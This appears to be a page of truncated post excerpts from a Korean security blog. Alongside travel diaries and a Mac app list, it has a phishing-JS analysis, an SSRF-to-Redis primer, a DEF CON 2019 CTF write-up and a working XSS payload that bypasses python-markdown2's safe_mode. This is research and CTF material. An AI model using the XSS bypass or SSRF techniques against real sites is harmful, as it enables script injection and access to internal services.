악성(피싱) 앱 분석기

이미지
- 분석은 예전에 했는데 시간이 바쁘다는 핑계로 글은 이제서야 쓰게 되었습니다. T.T - 악성코드를 주로 다루지 않다보니 잘못된 부분이 있을 수 있습니다. 해당 부분에 대해 알려주시면 감사하겠습니다. # 발단 최근 들어 피싱 문자가 많이 늘어난게 보인다. 지인에게 short url 서비스로 보내진 주소를 공유받아 접속해보았다. 처음 부터 흥미를 자극하는 난독화된 JS 코드가 보인다. ... 코드 마지막 부분에 보면 함수 호출`()`로 끝난다. 실제 로직이 포함된 코드를 실행하기 위해 마지막에 함수 호출을 할테니 해당 부분을 빼고 콘솔에서 실행해보았다. ```javascript (function anonymous( ) { var rNsMwWzBiNaSuYcTeJbHfLvZlTaRjBaMoZkUfOsFqMcGkCtRjUsKuSwHrYwVgXaSkUhKjPnFkPvDoMlQkTwJbAyDuZvV = { yCdZwGrUaDePkOsWuVyCuEpSdNfQsWaEjFeCgRaLkIt: function () { var u = navigator.userAgent, app = navigator.appVersion; return { uQnJaNmSpFjMeVbT: u.indexOf('Trident') > -1, lWtPeOsDbQnQbFiLdFpNfPaLxAzFeKvZyQzRcMlWnEpS: u.indexOf('Presto') > -1, gPxUjAsWuQnQuEaLkHyPoFjNuXpOyBhWjTdVfQbDoNyUfPgRjUwHzJiXaFeDnFwVfDpAzTyD: u.indexOf('AppleWebKit') > -1, nQzDtOzQiMiLpLpMdSwOyPhFxIeJnYiEwGrCfLjNfVgKuFiLrJuLvFqIsCuLkCfWlDcLrXvBuMsYjB: u.indexOf('Gecko') > -1 &&

나의 유용한 맥 앱

이미지
맥북을 사용하면서 좋았던 앱들을 추후에도 까먹지 않고 사용하기 위해 기록하여 남겨두려고 작성하게 되었습니다. Last Update: 2020-05-27 - Snappy (무료) Link:  https://apps.apple.com/app/snappyapp/id512617038 화면 캡처 및 관리 도구 분석 중에 화면을 왔다 갔다 하면서 봐야 하는 경우 아래 그림과 같이 스크린샷을 찍으면 해당 화면에 고정적으로 나오게 할 수 있어서 분석한 코드 보면서 PoC코드 짜거나 할 때 편하다. - Tunnelblick (무료) Link:  https://tunnelblick.net/downloads.html openVPN client, 맥 사용자 대부분이 사용하길래 따라서 사용했는데 크게 불편한 부분은 없어서 계속 사용 중. - Keka (무료) Link:  https://www.keka.io/ 윈도우랑 맥에서 압축 관련해서 파일 제목 깨지는 경우가 많은데 Keka 사용하면 압축이 잘 풀린다. - MTMR (무료) Link:  https://mtmr.app/ Github:  https://github.com/Toxblh/MTMR 터치바 커스텀 마이징. Json 형태로 이루어진 설정 파일 수정을 통해 원하는 터치바로 꾸밀 수 있다. - parallels (유료) Link:  https://www.parallels.com/ 가상화 프로그램. 맥 사용하면서도 은행/업무 등의 이유로 윈도우 또는 리눅스 사용해야 해서 구매하게 되었다. 블랙 프라이데이 할인으로 사면 조금은 저렴하게 구매할 수 있다.

SSRF to Redis

SSRF (Server-Side Request Forgery) SSRF는 서버의 요청을 변조하여 원하는 데이터 또는 원하는 타겟에 대해 서버의 자원을 이용해 요청을 보내는 공격 방법입니다. 다수의 마이크로 서비스로 이루어지는 모던 스택 또는 다른 서비스와 상호작용하는 형태에서 다른 서비스에 접근하여 취약점을 유발하는 SSRF취약점의 가치는 증가하게 되었습니다. Redis Key-Value 데이터 모델을 가진 NoSQL 데이터베이스입니다. 데이터를 메모리에 저장하는 인메모리 데이터베이스로 read/write 속도가 빠르다는 장점으로 대중적으로 많이 사용되고 있습니다. Redis는 왜 해커의 타겟이 되었나? Redis는 SSRF취약점 발생 시 주로 타겟이 되는 서비스 중 하나입니다. 이에 대한 이유는 아래와 같다고 생각됩니다. - 인증 체계 기본적으로 Redis는 인증 체계가 없으며, bind 127.0.0.1, port 6379로 서비스가 설정됩니다.  redis.conf의 내용 중 port와 bind에 대한 내용입니다. ```apache # Accept connections on the specified port, default is 6379. # If port 0 is specified Redis will not listen on a TCP socket. port 6379 ... # By default Redis listens for connections from all the network interfaces # available on the server. It is possible to listen to just one or multiple # interfaces using the "bind" configuration directive, followed by one or # more IP addresses. # # Examples: # # bind 192.168.1.100 10.0.0.1 bind 12

[python-markdown2] safe_mode Filter bypass 분석글

이미지
개요 * 작성일 기준 version: 2.3.8 ( https://github.com/trentm/python-markdown2/tree/4d2fc792abd7fbf8ddec937812857f13fded61cf ) CTF하다가 markdown2 모듈을 사용하길래 해당 모듈 찾아보다가 아래 이슈를 발견하였다. https://github.com/trentm/python-markdown2/issues/341 Filter Bypass ????!! - Expected Result ```python >>> import markdown2 >>> markdown2.markdown("[<script>alert(1)</script>]()", safe_mode=True) '<p><a href="#">[HTML_REMOVED]alert(1)[HTML_REMOVED]</a></p>\n' ``` - Issue Payload ```python >>> import markdown2 >>> markdown2.markdown('<http://g<!s://q?<!-<[<script>alert(1);/\*](http://g)->a><http://g<!s://g.c?<!-<[a\\*/</script>alert(1);/*](http://g)->a>', safe_mode=True) '<p><http://g<!s://q?<!-&lt;<a href="http://g"><script>alert(1);/*</a>->a><http://g<!s://g.c?<!-&lt;<a href=&

2019 미국 방문기

이미지
Day 1 ( Incheon -> Las Vegas) 비행기 출발 전 저녁 9시에 출발해서 12시간 쯤 걸려서 라스베가스(LAS)에 도착했다. (비행기 안에서 죽는줄 알았다. ㅡ.ㅡ) 너무 피곤해서 도착하자마자 바로 호텔로갔다. 이번에는 Bally's Hotel로 예약을 했다. Bally's Hotel Room 장시간 비행 + 시차로 인해 피곤해서 밥먹고 바로 잤다. 호텔 주변 식당에서 먹은건데 너무 피곤해서 맛도 기억이 안난다.... Day 2 라스베가스에 머무는 기간이 짧아서 조금 무리한 일정으로 그랜드 캐니언 밤도깨비 투어를 신청했다. 새벽에 출발하는 일정이고 그랜드 캐니언까지 가는 차에서 자면되겠지 하면서 신청했는데 자도 자도 너무 힘들었다. I LOVE LASVEGAS ! 사진으로 다 담을수 없어서 아쉽다. ㅠ.ㅠ 가는 길 중간 중간에 멈춰서 사진을 찍었다. 원래 같이 가는 일정을 신청한게 나 포함 6명이였는데 가는 포인트마다 아는 사람을 만나서 재미있게 놀았다. 거의 다 도착해서 밥을 먹었다. 그쯤 해가 뜨기 시작했다. WoW ~! WoW 22 해가 뜨니 풍경들이 보이기 시작했다. 그리고 앤텔로프 캐니언와 홀스슈 밴드에 갔었다. 해가 뜰때 풍경은 좋았는데, 사막이라는걸 몸소 느낄 수 있었다. 덥고 해가 너무 뜨거웠다. 그래서 그랜드 캐니언은 한번 갔다오면 기가 다 빠지는거 같다.  그렇게 투어하고 호텔로 돌아가는 길에 인앤아웃버거 먹고 바로 잤다. Day 3 오전에는 뭐했는지 정확히 기억이 안난다. ㅡ.ㅡ 그러다가 회사 사람들과 paris hotel에 있는 " Mon Ami Gabi " 레스토랑에서 저녁을 먹었다. 이때는 무슨 생각이였는지 모르겠지만 새로운걸 먹겠다고 생선 요리를 시켰다. 연어 였던걸로 기억하는데 너무 짜서 다먹지 못했다. ㅠㅠ 그리고 벨라지오

Defcon CTF quals 2019 : ooops

Category: Web Points: 137 Solves: 34 ## Description ``` On our corporate network, the only overflow is the Order of the Overflow. <a href="https://s3.us-east-2.amazonaws.com/oooverflow-challs/b48fb18a0837e8e6840d5101ff44bb9ee5ee1d22846580487ccce756b966f6b2/info.pac">info.pac</a> ``` ## Write-up ### 1. javascript deobfuscate. Change `eval` to `console.log`. ```js FindProxyForURL = function(url, host) { /* The only 'overflow' that employees can access is the Order of the Overflow. Log in with OnlyOne:Overflow. HTTPS support is coming soon. */ if (shExpMatch(host, 'oooverflow.io')) return 'DIRECT'; return 'PROXY ooops.quals2019.oooverflow.io:8080'; } ``` we can access challenge page ! ### 2. DNS Rebinding. if you send a URL, the bot access to the URL. And you look at the referer of http header, you can see that it starts from the internal IP address. (ex: 10.x.x.x) I tried DNS rebinding. I could not access the internal

2018 싱가포르 방문기

이미지
Day 1 오후 비행기를 타고 슝~ 생각보다 오래걸렸다. 6시간 정도? 그래서 기내식도 나와서 자다가 먹고 또 자다보니 도착했다. ㅋ 기내식 ㅎㅎ 호텔 체크인을 하고 먼저 싱가포르에 도착해있던 일행들을 만나서 저녁을 먹었다. 시장에서 바로 구워서 바로 먹을 수 있었다. 꿀맛~ Day 2 아침 일찍 눈이 떠졌다. 배고파서 호텔 1층 레스토랑에서 아침을 먹고 호텔 수영장에서 놀았다. 그리고 오후에는 싱가포르에서 일하고 계시는 분이 투어를 도와주셨다. 처음으로 가든스 바이 더 베이에 갔다. 밖은 무지 더웠는데 안에 들어가니 너무 시원했다. ㅎ 안에는 다양한 식물들이 있고 시원하다. 계속 있다보면 기분이 좋아진다. 그리고 바로 옆에 있는 마리나 베이 호텔까지 구경하고 저녁을 먹으러 어떤 시장에 갔다. (따라다녀서 이름은 기억이 나지 않는다. ㅡ.ㅡㅋ) 칠리 크랩 !! 역시 싱가포르 답게 다양한 해산물을 먹어보았다. 그중 최고는 칠리 크랩인데 같이 나오는 빵을 칠리 크랩 소스에 찍어서 먹으면 정말 맛있다. ㅎㅎ 먹고 소화 시킬겸 기념품 사러 마트에 갔다가 하루 마무리~ Day 3,4 (HITB-XCTF GSEC CTF) 구석 자리를 배정받았다. ㅎㅎ 대회가 끝나고 대회에 참여한 다른 한국팀분들과 같이 저녁 먹고 투어를 했다. ㅎ 마리나 베이 샌즈 야경 마리나 베이 샌즈에 있다가 운좋게 레이저 쇼하는 시간에 딱 맞아서 볼 수 있었다. 물을 뿌리고 그위에 레이저를 쏜다. 한번 시작하면 10분정도 한다. Day 5 싱가포르에 사시는 분께서 투어를 도와주시기로 한 날이다. 점심으로는 카야 토스트를 먹었다. 계란을 푼거에 같이 먹는데 진짜 맛있었다. 그리고 지하철을 타고 센토사 섬으로 갔다. 들어갈때는 걸어서 들어갔다. (나올때는 트램을 타고 나왔다.) 섬안에 구경할거도 많고 루지와 같이 즐길거리도 많았다. 센토사까지 왔으면 루지는 타보는 것을